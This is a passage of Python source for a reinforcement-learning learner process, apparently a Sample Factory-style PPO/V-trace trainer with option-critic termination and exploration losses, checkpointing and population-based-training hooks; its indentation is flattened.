'policy_version',
'rewards',
'dones',
'rewards_cpu',
'dones_cpu',
]
for tensor_name in tensors_to_squeeze:
device_buffer[tensor_name].squeeze_()
# we no longer need the cached buffer, and can put it back into the pool
self.tensor_batch_pool.put(buffer)
return device_buffer
def _macro_batch_size(self, batch_size):
return self.cfg.num_batches_per_iteration * batch_size
def _process_macro_batch(self, rollouts, batch_size, timing):
macro_batch_size = self._macro_batch_size(batch_size)
assert macro_batch_size % self.cfg.rollout == 0
assert self.cfg.rollout % self.cfg.recurrence == 0
assert macro_batch_size % self.cfg.recurrence == 0
samples = env_steps = 0
for rollout in rollouts:
samples += rollout['length']
env_steps += rollout['env_steps']
with timing.add_time('prepare'):
buffer = self._prepare_train_buffer(rollouts, macro_batch_size, timing)
self.experience_buffer_queue.put((buffer, batch_size, samples, env_steps))
if not self.cfg.benchmark and self.cfg.train_in_background_thread:
# in PyTorch 1.4.0 there is an intense memory spike when the very first batch is being processed
# we wait here until this is over so we can continue queueing more batches onto a GPU without having
# a risk to run out of GPU memory
while self.num_batches_processed < 1:
# log.debug('Waiting for the first batch to be processed')
time.sleep(0.5)
def _process_rollouts(self, rollouts, timing):
# batch_size can potentially change through PBT, so we should keep it the same and pass it around
# using function arguments, instead of using global self.cfg
batch_size = self.cfg.batch_size
rollouts_in_macro_batch = self._macro_batch_size(batch_size) // self.cfg.rollout
if len(rollouts) < rollouts_in_macro_batch:
return rollouts
discard_rollouts = 0
policy_version = self.train_step
for r in rollouts:
rollout_min_version = r['t']['policy_version'].min().item()
if policy_version - rollout_min_version >= self.cfg.max_policy_lag:
discard_rollouts += 1
self._mark_rollout_buffer_free(r)
else:
break
if discard_rollouts > 0:
log.warning(
'Discarding %d old rollouts, cut by policy lag threshold %d (learner %d)',
discard_rollouts,
self.cfg.max_policy_lag,
self.policy_id,
)
rollouts = rollouts[discard_rollouts:]
self.num_discarded_rollouts += discard_rollouts
if len(rollouts) >= rollouts_in_macro_batch:
# process newest rollouts
rollouts_to_process = rollouts[:rollouts_in_macro_batch]
rollouts = rollouts[rollouts_in_macro_batch:]
self._process_macro_batch(rollouts_to_process, batch_size, timing)
# log.info('Unprocessed rollouts: %d (%d samples)', len(rollouts), len(rollouts) * self.cfg.rollout)
return rollouts
def _get_minibatches(self, batch_size, experience_size):
"""Generating minibatches for training."""
assert self.cfg.rollout % self.cfg.recurrence == 0
assert experience_size % batch_size == 0, f'experience size: {experience_size}, batch size: {batch_size}'
if self.cfg.num_batches_per_iteration == 1:
return [None] # single minibatch is actually the entire buffer, we don't need indices
# indices that will start the mini-trajectories from the same episode (for bptt)
indices = np.arange(0, experience_size, self.cfg.recurrence)
indices = np.random.permutation(indices)
# complete indices of mini trajectories, e.g. with recurrence==4: [4, 16] -> [4, 5, 6, 7, 16, 17, 18, 19]
indices = [np.arange(i, i + self.cfg.recurrence) for i in indices]
indices = np.concatenate(indices)
assert len(indices) == experience_size
num_minibatches = experience_size // batch_size
minibatches = np.split(indices, num_minibatches)
return minibatches
@staticmethod
def _get_minibatch(buffer, indices):
if indices is None:
# handle the case of a single batch, where the entire buffer is a minibatch
return buffer
mb = AttrDict()
for item, x in buffer.items():
if isinstance(x, (dict, OrderedDict)):
mb[item] = AttrDict()
for key, x_elem in x.items():
mb[item][key] = x_elem[indices]
else:
mb[item] = x[indices]
return mb
def _should_save_summaries(self):
summaries_every_seconds = self.summary_rate_decay_seconds.at(self.train_step)
if time.time() - self.last_summary_time < summaries_every_seconds:
return False
return True
def _after_optimizer_step(self):
"""A hook to be called after each optimizer step."""
self.train_step += 1
self._maybe_save()
def _maybe_save(self):
if time.time() - self.last_saved_time >= self.cfg.save_every_sec or self.should_save_model:
self._save()
self.model_saved_event.set()
self.should_save_model = False
self.last_saved_time = time.time()
@staticmethod
def checkpoint_dir(cfg, policy_id):
checkpoint_dir = join(experiment_dir(cfg=cfg), f'checkpoint_p{policy_id}')
return ensure_dir_exists(checkpoint_dir)
@staticmethod
def get_checkpoints(checkpoints_dir):
checkpoints = glob.glob(join(checkpoints_dir, 'checkpoint_*'))
return sorted(checkpoints)
def _get_checkpoint_dict(self):
checkpoint = {
'train_step': self.train_step,
'env_steps': self.env_steps,
'model': self.actor_critic.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
if self.aux_loss_module is not None:
checkpoint['aux_loss_module'] = self.aux_loss_module.state_dict()
return checkpoint
def _save(self):
checkpoint = self._get_checkpoint_dict()
assert checkpoint is not None
checkpoint_dir = self.checkpoint_dir(self.cfg, self.policy_id)
tmp_filepath = join(checkpoint_dir, '.temp_checkpoint')
checkpoint_name = f'checkpoint_{self.train_step:09d}_{self.env_steps}.pth'
filepath = join(checkpoint_dir, checkpoint_name)
log.info('Saving %s...', tmp_filepath)
torch.save(checkpoint, tmp_filepath)
log.info('Renaming %s to %s', tmp_filepath, filepath)
os.rename(tmp_filepath, filepath)
while len(self.get_checkpoints(checkpoint_dir)) > self.cfg.keep_checkpoints:
oldest_checkpoint = self.get_checkpoints(checkpoint_dir)[0]
if os.path.isfile(oldest_checkpoint):
log.debug('Removing %s', oldest_checkpoint)
os.remove(oldest_checkpoint)
if self.cfg.save_milestones_sec > 0:
# milestones enabled
if time.time() - self.last_milestone_time >= self.cfg.save_milestones_sec:
milestones_dir = ensure_dir_exists(join(checkpoint_dir, 'milestones'))
milestone_path = join(milestones_dir, f'{checkpoint_name}.milestone')
log.debug('Saving a milestone %s', milestone_path)
shutil.copy(filepath, milestone_path)
self.last_milestone_time = time.time()
@staticmethod
def _policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high):
clipped_ratio = torch.clamp(ratio, clip_ratio_low, clip_ratio_high)
loss_unclipped = ratio * adv
loss_clipped = clipped_ratio * adv
loss = torch.min(loss_unclipped, loss_clipped)
loss = -loss.mean()
return loss
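# Worked example of the clipped surrogate above (illustrative numbers only):
# with clip_ratio_low = 0.9 and clip_ratio_high = 1.1, a sample with adv = +1 and
# ratio = 1.5 contributes min(1.5, 1.1) = 1.1, so the gradient through the overly
# large ratio is cut off; with adv = -1 the min() keeps the more negative
# (more pessimistic) of the clipped and unclipped terms.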
def _value_loss(self, new_values, old_values, target, clip_value):
value_clipped = old_values + torch.clamp(new_values - old_values, -clip_value, clip_value)
value_original_loss = (new_values - target).pow(2)
value_clipped_loss = (value_clipped - target).pow(2)
value_loss = torch.max(value_original_loss, value_clipped_loss)
value_loss = value_loss.mean()
value_loss *= self.cfg.value_loss_coeff
return value_loss
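# Note on the value loss above: it mirrors PPO-style clipping for the critic -- the new
# prediction may only move within +/- clip_value of the old prediction, and max() keeps
# the more pessimistic of the clipped/unclipped squared errors, limiting how far the
# value function can move in a single minibatch.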
def _termination_loss_func(self, indexed_values, values, terminations):
eps = self.cfg.option_epsilon
option_value = eps * values.mean(dim=1) + (1 - eps) * values.max(dim=1)[0]
grad = indexed_values - option_value + self.cfg.deliberation_cost
term_loss = grad * terminations
term_loss = term_loss.mean() * self.cfg.termination_loss_coeff
return term_loss
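# Note on the termination loss above (interpretation, not part of the original comments):
# this follows the option-critic termination gradient -- option_value is the value of an
# epsilon-greedy policy over options, grad is Q(s, option) - V(s) plus a deliberation
# cost, and weighting it by the termination probabilities encourages terminating options
# whose value falls below the state value.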
def entropy_exploration_loss(self, action_distribution, option_idx):
entropy = action_distribution.entropy().reshape(
-1, self.cfg.num_options) # (B * O) x 1 -> B x O
entropy = self._index_via_option_idx_in_rollout(entropy,
option_idx) # B x O and B x 1 -> B x 1
entropy_loss = -self.cfg.exploration_loss_coeff * entropy.mean()
return entropy_loss
def symmetric_kl_exploration_loss(self, action_distribution, option_idx):
kl_prior = action_distribution.symmetric_kl_with_uniform_prior().reshape(
-1, self.cfg.num_options) # (B * O) x 1 -> B x O
kl_prior = self._index_via_option_idx_in_rollout(kl_prior,
option_idx) # B x O and B x 1 -> B x 1
kl_prior = kl_prior.mean()
if not torch.isfinite(kl_prior):
kl_prior = torch.zeros(kl_prior.shape)
kl_prior = torch.clamp(kl_prior, max=30)
kl_prior_loss = self.cfg.exploration_loss_coeff * kl_prior
return kl_prior_loss
def _prepare_observations(self, obs_tensors, gpu_buffer_obs):
for d, gpu_d, k, v, _ in iter_dicts_recursively(obs_tensors, gpu_buffer_obs):
device, dtype = self.actor_critic.device_and_type_for_input_tensor(k)
tensor = v.detach().to(device, copy=True).type(dtype)
gpu_d[k] = tensor
def _copy_train_data_to_device(self, buffer):
device_buffer = copy_dict_structure(buffer)
for key, item in buffer.items():
if key == 'obs':
self._prepare_observations(item, device_buffer['obs'])
else:
device_tensor = item.detach().to(self.device, copy=True, non_blocking=True)
device_buffer[key] = device_tensor.float()
device_buffer['dones_cpu'] = buffer.dones.to('cpu', copy=True, non_blocking=True).float()
device_buffer['rewards_cpu'] = buffer.rewards.to('cpu', copy=True,
non_blocking=True).float()
return device_buffer
def _train(self, gpu_buffer, batch_size, experience_size, timing):
with torch.no_grad():
early_stopping_tolerance = 1e-6
early_stop = False
prev_epoch_actor_loss = 1e9
epoch_actor_losses = []
# V-trace parameters
# noinspection PyArgumentList
rho_hat = torch.Tensor([self.cfg.vtrace_rho])
# noinspection PyArgumentList
c_hat = torch.Tensor([self.cfg.vtrace_c])
clip_ratio_high = 1.0 + self.cfg.ppo_clip_ratio # e.g. 1.1
# the reciprocal lower bound still works for e.g. ppo_clip_ratio = 2, whereas PPO's usual 1 - clip_ratio would give a negative lower bound
clip_ratio_low = 1.0 / clip_ratio_high
clip_value = self.cfg.ppo_clip_value
gamma = self.cfg.gamma
recurrence = self.cfg.recurrence
if self.cfg.with_vtrace:
assert recurrence == self.cfg.rollout and recurrence > 1, \
'V-trace requires recurrence and rollout to be equal'
num_sgd_steps = 0
stats_and_summaries = None
if not self.with_training:
return stats_and_summaries
for epoch in range(self.cfg.ppo_epochs):
with timing.add_time('epoch_init'):
if early_stop or self.terminate:
break
summary_this_epoch = force_summaries = False
minibatches = self._get_minibatches(batch_size, experience_size)
for batch_num in range(len(minibatches)):
with timing.add_time('minibatch_init'):
indices = minibatches[batch_num]
# current minibatch consisting of short trajectory segments with length == recurrence
mb = self._get_minibatch(gpu_buffer, indices)
# calculate policy head outside of recurrent loop
with timing.add_time('forward_head'):
head_outputs = self.actor_critic.forward_head(mb.obs)
# initial rnn states
with timing.add_time('bptt_initial'):
if self.cfg.use_rnn:
head_output_seq, rnn_states, inverted_select_inds = build_rnn_inputs(
head_outputs, mb.dones_cpu, mb.rnn_states, recurrence,
)
else:
rnn_states = mb.rnn_states[::recurrence]
# calculate RNN outputs for each timestep in a loop
with timing.add_time('bptt'):
if self.cfg.use_rnn:
with timing.add_time('bptt_forward_core'):
core_output_seq, _ = self.actor_critic.forward_core(head_output_seq, rnn_states)
core_outputs = build_core_out_from_seq(core_output_seq,
inverted_select_inds)
else:
core_outputs, _ = self.actor_critic.forward_core(head_outputs, rnn_states)
num_trajectories = head_outputs.size(0) // recurrence
if self.aux_loss_module is not None:
with timing.add_time('aux_loss'):
aux_loss = self.aux_loss_module(
mb.actions.view(num_trajectories, recurrence, -1),
(1.0 - mb.dones).view(num_trajectories, recurrence, 1),
head_outputs.view(num_trajectories, recurrence, -1),
core_outputs.view(num_trajectories, recurrence, -1))
with timing.add_time('tail'):
assert core_outputs.shape[0] == head_outputs.shape[0]
# calculate policy tail outside of recurrent loop
result = self.actor_critic.forward_tail(core_outputs,
with_action_distribution=True)
action_distribution = result.action_distribution
log_prob_actions = action_distribution.log_prob(
mb.actions.reshape(
-1, # B x (num_actions * O) -> (B * O) x num_actions
self.num_actions)).reshape(-1,
self.cfg.num_options) # (B * O) x 1 -> B x O
log_prob_actions = self._index_via_option_idx_in_rollout(
log_prob_actions, mb.option_idx) # B x O, B x 1 -> B x 1
mb.log_prob_actions = self._index_via_option_idx_in_rollout(
mb.log_prob_actions, mb.option_idx) # B x O , B x 1 -> B x 1
ratio = torch.exp(log_prob_actions - mb.log_prob_actions) # pi / pi_old
# super large/small values can cause numerical problems and are probably noise anyway
ratio = torch.clamp(ratio, 0.05, 20.0)
values = self._index_via_option_idx_in_rollout(result.values, mb.option_idx)
with torch.no_grad(
):  # these computations are not part of the computation graph
if self.cfg.with_vtrace:
ratios_cpu = ratio.cpu()
values_cpu = values.cpu()
rewards_cpu = mb.rewards_cpu
dones_cpu = mb.dones_cpu
vtrace_rho = torch.min(rho_hat, ratios_cpu)
vtrace_c = torch.min(c_hat, ratios_cpu)
vs = torch.zeros((num_trajectories * recurrence))
adv = torch.zeros((num_trajectories * recurrence))
next_values = (values_cpu[recurrence - 1::recurrence] -
rewards_cpu[recurrence - 1::recurrence]) / gamma
next_vs = next_values
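# The backward loop below implements the V-trace recursion (Espeholt et al., 2018):
#   delta_t = rho_t * (r_t + gamma * V(x_{t+1}) - V(x_t))
#   vs_t    = V(x_t) + delta_t + gamma * c_t * (vs_{t+1} - V(x_{t+1}))
# with rho_t / c_t clipped at vtrace_rho / vtrace_c, gamma masked by dones, and
#   adv_t = rho_t * (r_t + gamma * vs_{t+1} - V(x_t))
# used as the policy-gradient advantage.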
with timing.add_time('vtrace'):
for i in reversed(range(self.cfg.recurrence)):
rewards = rewards_cpu[i::recurrence]
dones = dones_cpu[i::recurrence]
not_done = 1.0 - dones
not_done_times_gamma = not_done * gamma
curr_values = values_cpu[i::recurrence]
curr_vtrace_rho = vtrace_rho[i::recurrence]
curr_vtrace_c = vtrace_c[i::recurrence]
delta_s = curr_vtrace_rho * (
rewards + not_done_times_gamma * next_values - curr_values)
adv[i::recurrence] = curr_vtrace_rho * (
rewards + not_done_times_gamma * next_vs - curr_values)
next_vs = curr_values + delta_s + not_done_times_gamma * curr_vtrace_c * (
next_vs - next_values)
vs[i::recurrence] = next_vs
next_values = curr_values
targets = vs
else:
# using regular GAE
adv = mb.advantages
targets = mb.returns
adv_mean = adv.mean()
adv_std = adv.std()
adv = (adv - adv_mean) / max(1e-3, adv_std) # normalize advantage
adv = adv.to(self.device)
with timing.add_time('losses'):
policy_loss = self._policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high)
exploration_loss = self.exploration_loss_func(action_distribution,
mb.option_idx)
indexed_termination = self._index_via_option_idx_in_rollout(
result.termination_mask, mb.option_idx)
termination_loss = self._termination_loss_func(values,
result.values,
indexed_termination)
actor_loss = policy_loss + exploration_loss + termination_loss
epoch_actor_losses.append(actor_loss.item())
targets = targets.to(self.device)
old_values = mb.values
value_loss = self._value_loss(values, old_values, targets, clip_value)
critic_loss = value_loss
loss = actor_loss + critic_loss
high_loss = 30.0
if abs(to_scalar(policy_loss)) > high_loss or abs(
to_scalar(value_loss)) > high_loss or abs(
to_scalar(exploration_loss)) > high_loss:
log.warning(
'High loss value: %.4f %.4f %.4f %.4f (consider adjusting the --reward_scale parameter)',
to_scalar(loss),
to_scalar(policy_loss),
to_scalar(value_loss),
to_scalar(exploration_loss),
)
force_summaries = True
if self.aux_loss_module is not None:
loss = loss + aux_loss
# update the weights
with timing.add_time('update'):
# following advice from https://youtu.be/9mS1fIYj1So set grad to None instead of optimizer.zero_grad()
for p in self.actor_critic.parameters():
p.grad = None
if self.aux_loss_module is not None:
for p in self.aux_loss_module.parameters():
p.grad = None
loss.backward()
if self.cfg.max_grad_norm > 0.0:
with timing.add_time('clip'):
torch.nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.cfg.max_grad_norm)
if self.aux_loss_module is not None:
torch.nn.utils.clip_grad_norm_(self.aux_loss_module.parameters(),
self.cfg.max_grad_norm)
curr_policy_version = self.train_step # policy version before the weight update
with self.policy_lock:
self.optimizer.step()
num_sgd_steps += 1
with torch.no_grad():
with timing.add_time('after_optimizer'):
self._after_optimizer_step()
# collect and report summaries
with_summaries = self._should_save_summaries() or force_summaries
if with_summaries and not summary_this_epoch:
stats_and_summaries = self._record_summaries(AttrDict(locals()))
summary_this_epoch = True
force_summaries = False
# end of an epoch
# this will force policy update on the inference worker (policy worker)
self.policy_versions[self.policy_id] = self.train_step
new_epoch_actor_loss = np.mean(epoch_actor_losses)
loss_delta_abs = abs(prev_epoch_actor_loss - new_epoch_actor_loss)
if loss_delta_abs < early_stopping_tolerance:
early_stop = True
log.debug(
'Early stopping after %d epochs (%d sgd steps), loss delta %.7f',
epoch + 1,
num_sgd_steps,
loss_delta_abs,
)
break
prev_epoch_actor_loss = new_epoch_actor_loss
epoch_actor_losses = []
return stats_and_summaries
def _record_summaries(self, train_loop_vars):
var = train_loop_vars
self.last_summary_time = time.time()
stats = AttrDict()
grad_norm = sum(
p.grad.data.norm(2).item()**2
for p in self.actor_critic.parameters()
if p.grad is not None)**0.5
stats.grad_norm = grad_norm
stats.loss = var.loss
stats.value = var.result.values.mean()
stats.entropy = var.action_distribution.entropy().mean()
stats.policy_loss = var.policy_loss
stats.value_loss = var.value_loss
stats.termination_loss = var.termination_loss
stats.exploration_loss = var.exploration_loss
if self.aux_loss_module is not None:
stats.aux_loss = var.aux_loss
stats.adv_min = var.adv.min()
stats.adv_max = var.adv.max()
stats.adv_std = var.adv_std
reshaped_action_logits = var.mb.action_logits.reshape(-1,
self.num_action_logits,
self.cfg.num_options).permute(
0, 2, 1)
indexed_action_logits = self._index_via_option_idx_in_rollout(reshaped_action_logits,
var.mb.option_idx).squeeze()
stats.max_abs_logprob = torch.abs(indexed_action_logits).max()
if hasattr(var.action_distribution, 'summaries'):
stats.update(var.action_distribution.summaries())
if var.epoch == self.cfg.ppo_epochs - 1 and var.batch_num == len(var.minibatches) - 1:
# we collect these stats only for the last PPO batch, or every time if we're only doing one batch, IMPALA-style
ratio_mean = torch.abs(1.0 - var.ratio).mean().detach()
ratio_min = var.ratio.min().detach()
ratio_max = var.ratio.max().detach()
# log.debug('Learner %d ratio mean min max %.4f %.4f %.4f', self.policy_id, ratio_mean.cpu().item(), ratio_min.cpu().item(), ratio_max.cpu().item())
value_delta = torch.abs(var.values - var.old_values)
value_delta_avg, value_delta_max = value_delta.mean(), value_delta.max()
# calculate KL-divergence with the behaviour policy action distribution
old_action_distribution = get_action_distribution(self.actor_critic.action_space,
reshaped_action_logits.permute(
0, 2, 1),
num_options=self.cfg.num_options)
kl_old = var.action_distribution.kl_divergence(old_action_distribution)
kl_old_mean = kl_old.mean()
stats.kl_divergence = kl_old_mean
stats.value_delta = value_delta_avg
stats.value_delta_max = value_delta_max
stats.fraction_clipped = ((var.ratio < var.clip_ratio_low).float() +
(var.ratio > var.clip_ratio_high).float()).mean()
stats.ratio_mean = ratio_mean
stats.ratio_min = ratio_min
stats.ratio_max = ratio_max
stats.num_sgd_steps = var.num_sgd_steps
# this caused numerical issues on some versions of PyTorch with second moment reaching infinity
adam_max_second_moment = 0.0
for key, tensor_state in self.optimizer.state.items():
adam_max_second_moment = max(tensor_state['exp_avg_sq'].max().item(),
adam_max_second_moment)
stats.adam_max_second_moment = adam_max_second_moment
version_diff = var.curr_policy_version - var.mb.policy_version
stats.version_diff_avg = version_diff.mean()
stats.version_diff_min = version_diff.min()
stats.version_diff_max = version_diff.max()
for key, value in stats.items():
stats[key] = to_scalar(value)
return stats
def _update_pbt(self):
"""To be called from the training loop, same thread that updates the model!"""
with self.pbt_mutex:
if self.load_policy_id is not None:
assert self.cfg.with_pbt
log.debug('Learner %d loads policy from %d', self.policy_id, self.load_policy_id)
self.load_from_checkpoint(self.load_policy_id)
self.load_policy_id = None
if self.new_cfg is not None:
for key, value in self.new_cfg.items():
if self.cfg[key] != value:
log.debug('Learner %d replacing cfg parameter %r with new value %r',
self.policy_id,
key,
value)
self.cfg[key] = value
for param_group in self.optimizer.param_groups:
param_group['lr'] = self.cfg.learning_rate
param_group['betas'] = (self.cfg.adam_beta1, self.cfg.adam_beta2)
log.debug('Updated optimizer lr to value %.7f, betas: %r',
param_group['lr'],
param_group['betas'])
self.new_cfg = None
@staticmethod
def load_checkpoint(checkpoints, device):
if len(checkpoints) <= 0:
log.warning('No checkpoints found')
return None
else:
latest_checkpoint = checkpoints[-1]
# extra safety mechanism to recover from spurious filesystem errors
num_attempts = 3
for attempt in range(num_attempts):
try:
log.warning('Loading state from checkpoint %s...', latest_checkpoint)
checkpoint_dict = torch.load(latest_checkpoint, map_location=device)
return checkpoint_dict
except Exception:
log.exception(f'Could not load from checkpoint, attempt {attempt}')
def _load_state(self, checkpoint_dict, load_progress=True):
if load_progress:
self.train_step = checkpoint_dict['train_step']
self.env_steps = checkpoint_dict['env_steps']
self.actor_critic.load_state_dict(checkpoint_dict['model'])
self.optimizer.load_state_dict(checkpoint_dict['optimizer'])
if self.aux_loss_module is not None:
self.aux_loss_module.load_state_dict(checkpoint_dict['aux_loss_module'])
log.info('Loaded experiment state at training iteration %d, env step %d',
self.train_step,
self.env_steps)
def init_model(self, timing):
self.actor_critic = create_actor_critic(self.cfg, self.obs_space, self.action_space, timing)
self.actor_critic.model_to_device(self.device)
self.actor_critic.share_memory()
if self.cfg.use_cpc:
self.aux_loss_module = CPCA(self.cfg, self.action_space)
if self.aux_loss_module is not None:
self.aux_loss_module.to(device=self.device)
def load_from_checkpoint(self, policy_id):
checkpoints = self.get_checkpoints(self.checkpoint_dir(self.cfg, policy_id))
checkpoint_dict = self.load_checkpoint(checkpoints, self.device)
if checkpoint_dict is None:
log.debug('Did not load from checkpoint, starting from scratch!')
else:
log.debug('Loading model from checkpoint')
# if we're replacing our policy with another policy (under PBT), let's not reload the env_steps
load_progress = policy_id == self.policy_id
self._load_state(checkpoint_dict, load_progress=load_progress)
def initialize(self, timing):
with timing.timeit('init'):
# initialize the Torch modules
if self.cfg.seed is None:
log.info('Starting seed is not provided')
else:
log.info('Setting fixed seed %d', self.cfg.seed)
torch.manual_seed(self.cfg.seed)
np.random.seed(self.cfg.seed)
# this does not help with a single experiment
# but seems to do better when we're running more than one experiment in parallel
torch.set_num_threads(1)
if self.cfg.device == 'gpu':
torch.backends.cudnn.benchmark = True
# we should already see only one CUDA device, because of env vars
assert torch.cuda.device_count() == 1
self.device = torch.device('cuda', index=0)
else:
self.device = torch.device('cpu')
self.init_model(timing)
params = list(self.actor_critic.parameters())
if self.aux_loss_module is not None:
params += list(self.aux_loss_module.parameters())
self.optimizer = torch.optim.Adam(
params,
self.cfg.learning_rate,
betas=(self.cfg.adam_beta1, self.cfg.adam_beta2),
eps=self.cfg.adam_eps,
)
self.load_from_checkpoint(self.policy_id)
self._broadcast_model_weights() # sync the very first version of the weights
self.train_thread_initialized.set()
def _process_training_data(self, data, timing, wait_stats=None):
self.is_training = True
buffer, batch_size, samples, env_steps = data
assert samples == batch_size * self.cfg.num_batches_per_iteration
self.env_steps += env_steps
experience_size = buffer.rewards.shape[0]
stats = dict(learner_env_steps=self.env_steps, policy_id=self.policy_id)
with timing.add_time('train'):
discarding_rate = self._discarding_rate()
self._update_pbt()
train_stats = self._train(buffer, batch_size, experience_size, timing)
if train_stats is not None:
stats['train'] = train_stats
if wait_stats is not None:
wait_avg, wait_min, wait_max = wait_stats
stats['train']['wait_avg'] = wait_avg
stats['train']['wait_min'] = wait_min
stats['train']['wait_max'] = wait_max
stats['train']['discarded_rollouts'] = self.num_discarded_rollouts
stats['train']['discarding_rate'] = discarding_rate
stats['stats'] = memory_stats('learner', self.device)
self.is_training = False
try:
safe_put(self.report_queue, stats, queue_name='report')
except Full:
log.warning('Could not report training stats, the report queue is full!')
def _train_loop(self):
timing = Timing()
self.initialize(timing)
wait_times = deque([], maxlen=self.cfg.num_workers)
last_cache_cleanup = time.time()
while not self.terminate:
with timing.timeit('train_wait'):
data = safe_get(self.experience_buffer_queue)
if self.terminate:
break
wait_stats = None
wait_times.append(timing.train_wait)
if len(wait_times) >= wait_times.maxlen:
wait_times_arr = np.asarray(wait_times)
wait_avg = np.mean(wait_times_arr)
wait_min, wait_max = wait_times_arr.min(), wait_times_arr.max()
# log.debug(
# 'Training thread had to wait %.5f s for the new experience buffer (avg %.5f)',
# timing.train_wait, wait_avg,
# )
wait_stats = (wait_avg, wait_min, wait_max)
self._process_training_data(data, timing, wait_stats)
self.num_batches_processed += 1
if time.time() - last_cache_cleanup > 300.0 or (not self.cfg.benchmark and
self.num_batches_processed < 50):
if self.cfg.device == 'gpu':
torch.cuda.empty_cache()
torch.cuda.ipc_collect()
last_cache_cleanup = time.time()
time.sleep(0.3)
log.info('Train loop timing: %s', timing)
del self.actor_critic
del self.device
def _experience_collection_rate_stats(self):
now = time.time()
if now - self.discarded_experience_timer > 1.0:
self.discarded_experience_timer = now
self.discarded_experience_over_time.append((now, self.num_discarded_rollouts))
def _discarding_rate(self):
if len(self.discarded_experience_over_time) <= 1:
return 0
first, last = self.discarded_experience_over_time[0], self.discarded_experience_over_time[-1]
delta_rollouts = last[1] - first[1]
delta_time = last[0] - first[0]
discarding_rate = delta_rollouts / (delta_time + EPS)
return discarding_rate
def _extract_rollouts(self, data):
data = AttrDict(data)
worker_idx, split_idx, traj_buffer_idx = data.worker_idx, data.split_idx, data.traj_buffer_idx
rollouts = []
for rollout_data in data.rollouts:
env_idx, agent_idx = rollout_data['env_idx'], rollout_data['agent_idx']
tensors = self.rollout_tensors.index(
(worker_idx, split_idx, env_idx, agent_idx, traj_buffer_idx))
rollout_data['t'] = tensors
rollout_data['worker_idx'] = worker_idx
rollout_data['split_idx'] = split_idx
rollout_data['traj_buffer_idx'] = traj_buffer_idx
rollouts.append(AttrDict(rollout_data))
return rollouts
def _process_pbt_task(self, pbt_task):
task_type, data = pbt_task
with self.pbt_mutex:
if task_type == PbtTask.SAVE_MODEL:
policy_id = data
assert policy_id == self.policy_id
self.should_save_model = True
elif task_type == PbtTask.LOAD_MODEL:
policy_id, new_policy_id = data
assert policy_id == self.policy_id
assert new_policy_id is not None
self.load_policy_id = new_policy_id
elif task_type == PbtTask.UPDATE_CFG:
policy_id, new_cfg = data
assert policy_id == self.policy_id
self.new_cfg = new_cfg
def _accumulated_too_much_experience(self, rollouts):
max_minibatches_to_accumulate = self.cfg.num_minibatches_to_accumulate
if max_minibatches_to_accumulate == -1:
# default value
max_minibatches_to_accumulate = 2 * self.cfg.num_batches_per_iteration
# allow the max batches to accumulate, plus the minibatches we're currently training on
max_minibatches_on_learner = max_minibatches_to_accumulate + self.cfg.num_batches_per_iteration
minibatches_currently_training = int(self.is_training) * self.cfg.num_batches_per_iteration
rollouts_per_minibatch = self.cfg.batch_size / self.cfg.rollout
# count contribution from unprocessed rollouts
minibatches_currently_accumulated = len(rollouts) / rollouts_per_minibatch
# count minibatches ready for training
minibatches_currently_accumulated += self.experience_buffer_queue.qsize(
) * self.cfg.num_batches_per_iteration
total_minibatches_on_learner = minibatches_currently_training + minibatches_currently_accumulated
return total_minibatches_on_learner >= max_minibatches_on_learner
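# Example of the accounting above (illustrative numbers only): with batch_size=1024,
# rollout=32 and num_batches_per_iteration=1, one minibatch corresponds to 32 rollouts;
# with the default num_minibatches_to_accumulate == -1 we allow 2 minibatches to
# accumulate plus 1 currently being trained on, so experience collection is throttled
# once roughly 3 * 32 rollouts worth of data sits on the learner.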
def _run(self):
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
psutil.Process().nice(self.cfg.default_niceness)
except psutil.AccessDenied:
log.error('Low niceness requires sudo!')
if self.cfg.device == 'gpu':
cuda_envvars_for_policy(self.policy_id, 'learner')
torch.multiprocessing.set_sharing_strategy('file_system')
torch.set_num_threads(self.cfg.learner_main_loop_num_cores)
timing = Timing()
rollouts = []
if self.train_in_background:
self.training_thread.start()
else:
self.initialize(timing)
log.error(
'train_in_background set to False on learner %d! This is slow, use only for testing!',
self.policy_id,
)
while not self.terminate:
while True:
try:
tasks = self.task_queue.get_many(timeout=0.005)
for task_type, data in tasks:
if task_type == TaskType.TRAIN:
with timing.add_time('extract'):
rollouts.extend(self._extract_rollouts(data))
# log.debug('Learner %d has %d rollouts', self.policy_id, len(rollouts))
elif task_type == TaskType.INIT:
self._init()
elif task_type == TaskType.TERMINATE:
time.sleep(0.3)
log.info('GPU learner timing: %s', timing)
self._terminate()
break
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
except Empty:
break
if self._accumulated_too_much_experience(rollouts):
# if we accumulated too much experience, signal the policy workers to stop experience collection
if not self.stop_experience_collection[self.policy_id]:
self.stop_experience_collection_num_msgs += 1
# TODO: add a logger function for this
if self.stop_experience_collection_num_msgs >= 50:
log.info(
'Learner %d accumulated too much experience, stop experience collection! '
'Learner is likely a bottleneck in your experiment (%d times)',
self.policy_id,
self.stop_experience_collection_num_msgs,
)
self.stop_experience_collection_num_msgs = 0
self.stop_experience_collection[self.policy_id] = True
elif self.stop_experience_collection[self.policy_id]:
# otherwise, resume the experience collection if it was stopped
self.stop_experience_collection[self.policy_id] = False
with self.resume_experience_collection_cv:
self.resume_experience_collection_num_msgs += 1
if self.resume_experience_collection_num_msgs >= 50:
log.debug('Learner %d is resuming experience collection!', self.policy_id)
self.resume_experience_collection_num_msgs = 0
self.resume_experience_collection_cv.notify_all()
with torch.no_grad():
rollouts = self._process_rollouts(rollouts, timing)
if not self.train_in_background:
while not self.experience_buffer_queue.empty():
training_data = self.experience_buffer_queue.get()
self._process_training_data(training_data, timing)
self._experience_collection_rate_stats()
if self.train_in_background:
self.experience_buffer_queue.put(None)
self.training_thread.join()
def init(self):
self.task_queue.put((TaskType.INIT, None))
self.initialized_event.wait()
def save_model(self, timeout=None):
self.model_saved_event.clear()
save_task = (PbtTask.SAVE_MODEL, self.policy_id)
self.task_queue.put((TaskType.PBT, save_task))
log.debug('Wait while learner %d saves the model...', self.policy_id)
if self.model_saved_event.wait(timeout=timeout):
log.debug('Learner %d saved the model!', self.policy_id)
else:
log.warning('Model saving request timed out!')
self.model_saved_event.clear()
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
def join(self):
